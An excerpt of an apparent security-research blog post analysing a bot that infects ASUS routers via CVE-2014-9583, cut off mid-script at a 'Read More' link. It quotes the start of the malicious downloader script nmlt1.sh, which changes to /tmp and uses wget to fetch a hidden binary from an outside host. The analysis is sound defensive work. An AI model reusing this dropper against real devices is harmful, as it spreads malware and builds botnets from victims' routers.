In the post "Home Routers - New Favorite of Cybercriminals in 2016", we discussed the active detection of vulnerability CVE-2014-9583 in ASUS routers since June of this year. In this post we will dissect a bot installed on the affected ASUS routers. The following figure shows attack traffic captured through Wireshark. Figure 1 Exploitation of CVE-2014-9583 Below is the content of file nmlt1.sh downloaded from hxxp://78.128.92.137:80/. #!/bin/sh cd /tmp rm -f .nttpd wget -O .nttpd http://stuf.in/begh0Array ...

Read More...